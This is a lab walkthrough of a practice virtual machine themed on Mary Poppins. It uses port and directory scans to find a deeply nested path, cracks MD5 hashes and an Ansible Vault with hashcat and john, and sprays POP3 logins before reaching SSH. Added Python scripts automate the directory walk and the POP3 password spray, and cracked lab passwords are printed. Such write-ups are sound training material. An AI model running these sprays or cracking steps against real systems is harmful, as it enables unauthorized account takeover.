┌──(root㉿kali)-[~]
└─# arp-scan -I eth2 -l
Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:31:fc:54 PCS Systemtechnik GmbH
192.168.56.127 08:00:27:e2:41:cd PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.272 seconds (112.68 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.127
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-11 23:40 EST
Nmap scan report for 192.168.56.127
Host is up (0.011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Mary Poppins - A Timeless Classic
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL TOP AUTH-RESP-CODE PIPELINING SASL(PLAIN) CAPA STLS USER
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Not valid before: 2025-08-29T16:42:33
|_Not valid after: 2035-08-27T16:42:33
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES SASL(PLAIN) UIDL USER AUTH-RESP-CODE PIPELINING TOP CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Not valid before: 2025-08-29T16:42:33
|_Not valid after: 2035-08-27T16:42:33
MAC Address: 08:00:27:E2:41:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 11.01 ms 192.168.56.127

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.32 seconds

┌──(root㉿kali)-[~]
└─# feroxbuster -u http://192.168.56.127

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.127
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 312c http://192.168.56.127/s => http://192.168.56.127/s/
200 GET 131l 472w 4703c http://192.168.56.127/
301 GET 9l 28w 314c http://192.168.56.127/s/u => http://192.168.56.127/s/u/
301 GET 9l 28w 316c http://192.168.56.127/s/u/p => http://192.168.56.127/s/u/p/
301 GET 9l 28w 318c http://192.168.56.127/s/u/p/e => http://192.168.56.127/s/u/p/e/
[####################] - 23s 120013/120013 0s found:5 errors:39
[####################] - 17s 30000/30000 1736/s http://192.168.56.127/
[####################] - 19s 30000/30000 1611/s http://192.168.56.127/s/
[####################] - 19s 30000/30000 1595/s http://192.168.56.127/s/u/
[####################] - 18s 30000/30000 1654/s http://192.168.56.127/s/u/p/
┌──(root㉿kali)-[~]
└─#

This directory tree looks odd: every level is a single character, as if a word had been split one letter per directory. The scan also stopped at /s/u/p/e/ only because feroxbuster's default recursion depth is 4, not because the tree ends there.

Build a one-character-per-line wordlist and keep brute-forcing. Note that the first run below still uses the default depth and therefore stops at the same place; the second run raises --depth so recursion follows the chain to its end.

┌──(root㉿kali)-[/tmp]
└─# printf "%s\n" {a..z} >> 1.txt

┌──(root㉿kali)-[/tmp]
└─# cat 1.txt
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z

┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.127 -w 1.txt

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.127
🚀 Threads │ 50
📖 Wordlist │ 1.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 131l 472w 4703c http://192.168.56.127/
301 GET 9l 28w 312c http://192.168.56.127/s => http://192.168.56.127/s/
301 GET 9l 28w 314c http://192.168.56.127/s/u => http://192.168.56.127/s/u/
301 GET 9l 28w 316c http://192.168.56.127/s/u/p => http://192.168.56.127/s/u/p/
301 GET 9l 28w 318c http://192.168.56.127/s/u/p/e => http://192.168.56.127/s/u/p/e/
[####################] - 5s 124/124 0s found:5 errors:0
[####################] - 5s 27/27 5/s http://192.168.56.127/
[####################] - 0s 27/27 1421/s http://192.168.56.127/s/
[####################] - 1s 27/27 27/s http://192.168.56.127/s/u/
[####################] - 1s 27/27 27/s http://192.168.56.127/s/u/p/
┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.127 -w 1.txt --depth=99999

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.127
🚀 Threads │ 50
📖 Wordlist │ 1.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 99999
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 131l 472w 4703c http://192.168.56.127/
301 GET 9l 28w 312c http://192.168.56.127/s => http://192.168.56.127/s/
301 GET 9l 28w 314c http://192.168.56.127/s/u => http://192.168.56.127/s/u/
301 GET 9l 28w 316c http://192.168.56.127/s/u/p => http://192.168.56.127/s/u/p/
301 GET 9l 28w 318c http://192.168.56.127/s/u/p/e => http://192.168.56.127/s/u/p/e/
301 GET 9l 28w 320c http://192.168.56.127/s/u/p/e/r => http://192.168.56.127/s/u/p/e/r/
301 GET 9l 28w 322c http://192.168.56.127/s/u/p/e/r/c => http://192.168.56.127/s/u/p/e/r/c/
301 GET 9l 28w 324c http://192.168.56.127/s/u/p/e/r/c/a => http://192.168.56.127/s/u/p/e/r/c/a/
301 GET 9l 28w 326c http://192.168.56.127/s/u/p/e/r/c/a/l => http://192.168.56.127/s/u/p/e/r/c/a/l/
301 GET 9l 28w 328c http://192.168.56.127/s/u/p/e/r/c/a/l/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/
301 GET 9l 28w 330c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/
301 GET 9l 28w 332c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/
301 GET 9l 28w 334c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/
301 GET 9l 28w 336c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/
301 GET 9l 28w 338c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/
301 GET 9l 28w 342c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/
301 GET 9l 28w 346c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/
301 GET 9l 28w 350c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/
301 GET 9l 28w 352c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/
301 GET 9l 28w 354c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/
301 GET 9l 28w 356c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/
301 GET 9l 28w 358c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/
301 GET 9l 28w 362c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/
301 GET 9l 28w 364c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/
301 GET 9l 28w 366c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/
301 GET 9l 28w 368c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/
301 GET 9l 28w 370c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/
301 GET 9l 28w 372c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/
301 GET 9l 28w 374c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/
301 GET 9l 28w 376c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
301 GET 9l 28w 378c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
301 GET 9l 28w 340c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/
301 GET 9l 28w 344c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/
301 GET 9l 28w 348c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/
301 GET 9l 28w 360c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a => http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/
[####################] - 9s 2135/2135 0s found:35 errors:0
[####################] - 3s 27/27 8/s http://192.168.56.127/
[####################] - 3s 27/27 9/s http://192.168.56.127/s/
[####################] - 0s 27/27 1421/s http://192.168.56.127/s/u/
[####################] - 0s 27/27 1688/s http://192.168.56.127/s/u/p/
[####################] - 1s 27/27 27/s http://192.168.56.127/s/u/p/e/
[####################] - 0s 27/27 1227/s http://192.168.56.127/s/u/p/e/r/
[####################] - 1s 27/27 27/s http://192.168.56.127/s/u/p/e/r/c/
[####################] - 0s 27/27 1286/s http://192.168.56.127/s/u/p/e/r/c/a/
[####################] - 0s 27/27 1227/s http://192.168.56.127/s/u/p/e/r/c/a/l/
[####################] - 0s 27/27 1125/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/
[####################] - 0s 27/27 1227/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/
[####################] - 0s 27/27 900/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/
[####################] - 0s 27/27 1125/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/
[####################] - 0s 27/27 600/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/
[####################] - 1s 27/27 32/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/
[####################] - 2s 27/27 15/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/
[####################] - 3s 27/27 9/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/
[####################] - 3s 27/27 9/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/
[####################] - 3s 27/27 9/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/
[####################] - 3s 27/27 10/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/
[####################] - 3s 27/27 10/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/
[####################] - 3s 27/27 10/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/
[####################] - 4s 27/27 7/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/
[####################] - 4s 27/27 7/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/
[####################] - 5s 27/27 6/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/
[####################] - 5s 27/27 5/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/
[####################] - 0s 27/27 500/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/
[####################] - 0s 27/27 529/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/
[####################] - 0s 27/27 551/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/
[####################] - 0s 27/27 509/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/
[####################] - 0s 27/27 474/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/
[####################] - 0s 27/27 600/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/
[####################] - 0s 27/27 397/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/
[####################] - 0s 27/27 466/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
[####################] - 0s 27/27 397/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
┌──(root㉿kali)-[/tmp]
└─#
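The two runs above recover the word only because recursion is allowed to go deep enough. The following is an added example, not code from the original write-up: it walks such a one-character-per-level tree directly, following Apache's 301 (directory exists, redirect to the trailing-slash form) one letter at a time, depth-first, and returns every leaf, so no recursion-depth setting is involved. The `probe` callable is injected: `http_probe` makes real requests with the standard library, while `fake_probe_for` is a constructed stand-in that lets the walk run offline.

```python
"""Walk an Apache directory tree whose names are one character per level.

Added example; this is not code from the original write-up, it generalises
the two feroxbuster runs above. Instead of depending on a recursion depth,
it follows 301 responses one character at a time (depth-first) and returns
every leaf directory, so the whole word is recovered however deep it goes.
The `probe` callable is injected: `http_probe` does real requests with the
standard library, `fake_probe_for` is a constructed stand-in for testing.
"""
import string
import urllib.error
import urllib.request
from typing import Callable, Iterable, List


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 301/302 as an HTTPError instead of following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_probe(base_url: str, timeout: float = 7.0) -> Callable[[str], int]:
    """Return probe(path) -> HTTP status for base_url + path (e.g. '/s/u')."""
    opener = urllib.request.build_opener(_NoRedirect)

    def probe(path: str) -> int:
        try:
            return opener.open(base_url + path, timeout=timeout).status
        except urllib.error.HTTPError as exc:
            return exc.code

    return probe


def walk_single_char_dirs(probe: Callable[[str], int],
                          alphabet: Iterable[str] = string.ascii_lowercase,
                          root: str = "/",
                          max_depth: int = 64) -> List[str]:
    """Depth-first walk. Apache answers 301 for '/x' (no trailing slash)
    when directory 'x' exists and 404 otherwise, so one request per letter
    per level is enough. Returns the directories that have no children."""
    alphabet = list(alphabet)
    leaves: List[str] = []
    stack = [(root, 0)]
    while stack:
        path, depth = stack.pop()
        children = [path + ch + "/" for ch in alphabet if probe(path + ch) == 301]
        if not children or depth >= max_depth:
            leaves.append(path)          # end of a word (or depth cap hit)
        else:
            stack.extend((child, depth + 1) for child in children)
    return sorted(leaves)


def leaf_to_word(path: str) -> str:
    """'/s/u/p/' -> 'sup'."""
    return path.strip("/").replace("/", "")


def fake_probe_for(*words: str) -> Callable[[str], int]:
    """Constructed stand-in for a server holding each word as a chain of
    one-character directories; answers 301 if the path exists, else 404."""
    existing = {"/" + "/".join(w[:i]) for w in words for i in range(1, len(w) + 1)}
    return lambda path: 301 if path in existing else 404


if __name__ == "__main__":
    # Offline demo on the word the write-up recovered; swap in
    # http_probe("http://192.168.56.127") to run it against the box.
    for leaf in walk_single_char_dirs(fake_probe_for("supercalifragilisticexpialidocious")):
        print(leaf, "->", leaf_to_word(leaf))
```

Against the real host the walk costs 26 requests per level instead of a full wordlist per level, and it branches correctly if two words share a prefix, which a single recursion chain would not show.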

Continue brute-forcing inside the deepest directory, this time with a real wordlist, a set of file extensions and directory-listing parsing (-C 503,404 drops those status codes from the output):

┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 7z,bak,pem,001,php,zip,txt,html,htm --scan-dir-listings -C 503,404 --depth=99999

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
💢 Status Code Filters │ [503, 404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [7z, bak, pem, 001, php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 99999
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 60l 141w 1531c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
200 GET 60l 141w 1531c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/index.html
200 GET 100l 100w 3300c http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/hash.bak
[##>-----------------] - 43s 258923/2205460 6m found:3 errors:0
[##>-----------------] - 43s 258600/2205460 6067/s http://192.168.56.127/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/

This turns up hash.bak (100 lines, 3300 bytes, i.e. 32 hex characters plus a newline per line).

image-20260212125634739

Crack it with hashcat in mode 0 (raw MD5, which matches the 32-hex-character lines):

hashcat -m 0 -a 0 hash.bak rockyou.txt

image-20260212125854055

Put the cracked passwords into a wordlist.

The user names are presumably the characters listed on the homepage.

image-20260212130453487

Testing showed the user names are lowercase.

Brute-forcing with hydra came up empty.

Manual testing showed that the password is only checked when the user name exists.

image-20260212130804931

POP3, however, can be brute-forced normally and yields a user name and password, but that user name and password do not work for SSH.
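The user-name guessing and the POP3 spray above, as an added example that is not code from the original write-up. The names are a constructed sample standing in for whatever characters the homepage lists; `username_candidates` emits the lowercase variants a spray usually needs (the write-up found the accounts were lowercase), and `pop3_login` is the USER/PASS check hydra performs, with the connection factory injectable so the spray can be exercised offline against the constructed `FakePOP3` (its account and password are hypothetical).

```python
"""Username candidates from homepage names, checked against POP3.

Added example, not code from the original write-up. The names are a
constructed sample standing in for the characters listed on the target's
homepage; `username_candidates` emits the lowercase forms a spray usually
needs (the write-up found the accounts were lowercase). `pop3_login` is the
check hydra performed; the connection factory is injectable so the spray
can be exercised offline with the constructed `FakePOP3`.
"""
import poplib
import re
from typing import Callable, Dict, Iterable, List


def username_candidates(names: Iterable[str]) -> List[str]:
    """For 'Mary Poppins' -> mary, poppins, mary.poppins, mpoppins, marypoppins.
    Single-word names yield just the word. Deduplicated, order preserved."""
    seen, out = set(), []
    for full in names:
        parts = [p for p in re.split(r"[^a-z]+", full.lower()) if p]
        if not parts:
            continue
        first, last = parts[0], parts[-1]
        if len(parts) == 1:
            variants = [first]
        else:
            variants = [first, last, f"{first}.{last}", first[0] + last, first + last]
        for v in variants:
            if v not in seen:
                seen.add(v)
                out.append(v)
    return out


def pop3_login(host: str, user: str, password: str,
               connect: Callable = poplib.POP3, port: int = 110,
               timeout: float = 7.0) -> bool:
    """True if the server accepts USER/PASS. poplib raises error_proto on -ERR."""
    conn = connect(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        return True
    except poplib.error_proto:
        return False
    finally:
        try:
            conn.quit()
        except Exception:
            pass


def spray(host: str, users: Iterable[str], passwords: Iterable[str],
          connect: Callable = poplib.POP3) -> Dict[str, str]:
    """Try every password for every user; first hit per user wins.
    One fresh connection per attempt, like hydra's default."""
    passwords = list(passwords)
    hits: Dict[str, str] = {}
    for user in users:
        for pw in passwords:
            if pop3_login(host, user, pw, connect=connect):
                hits[user] = pw
                break
    return hits


class FakePOP3:
    """Constructed stand-in for poplib.POP3 (no network). The account and
    password are hypothetical, not the box's real credentials."""
    ACCOUNTS = {"jane": "pw-example"}

    def __init__(self, host, port=110, timeout=None):
        self._user = None

    def user(self, name):
        self._user = name
        return b"+OK"

    def pass_(self, password):
        if self.ACCOUNTS.get(self._user) == password:
            return b"+OK Logged in."
        raise poplib.error_proto(b"-ERR [AUTH] Authentication failed.")

    def quit(self):
        return b"+OK"


if __name__ == "__main__":
    users = username_candidates(["Mary Poppins", "Jane Banks", "Bert"])
    print(users)
    # Offline demo; drop connect=FakePOP3 to hit 192.168.56.127:110 for real.
    print(spray("192.168.56.127", users, ["wrong", "pw-example"], connect=FakePOP3))
```

Port 110 here advertises USER and SASL(PLAIN) without requiring STLS, so the plaintext USER/PASS exchange is what the server actually accepts; against a server that enforces STLS, call `conn.stls()` before `user()`.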

image-20260212131446646

image-20260212131626616

image-20260212131700856

Convert the vault file (vault.txt) with ansible2john into a hash format john recognises:

┌──(root㉿kali)-[/tmp]
└─# ansible2john vault.txt > hash.txt

Crack it with john:

┌──(root㉿kali)-[/tmp]
└─# john hash.txt --wordlist=/root/yiyi/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:39 0.41% (ETA: 03:06:32) 0g/s 1791p/s 1791c/s 1791C/s richard!..nick20
javiel (vault.txt)
1g 0:00:00:50 DONE (2026-02-12 00:27) 0.01989g/s 1768p/s 1768c/s 1768C/s kiss1..janele
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(root㉿kali)-[/tmp]
└─# john hash.txt --show
vault.txt:javiel

1 password hash cracked, 0 left

┌──(root㉿kali)-[/tmp]
└─#

Manual testing earlier showed that jane exists, so try SSH directly.

image-20260212133026799

The vault password just recovered also decrypts the vault itself, which turns out to contain michael's password (found by testing):

┌──(root㉿kali)-[/tmp]
└─# ansible-vault view vault.txt
Vault password:
cumibug

I looked up the standard approach to Ansible Vault (first time I have run into it):

crack the vault password offline first, then use that password to decrypt the vault file normally:

ansible2john vault.txt > hash.txt
john hash.txt --wordlist=/root/yiyi/rockyou.txt
john hash.txt --show
ansible-vault view vault.txt
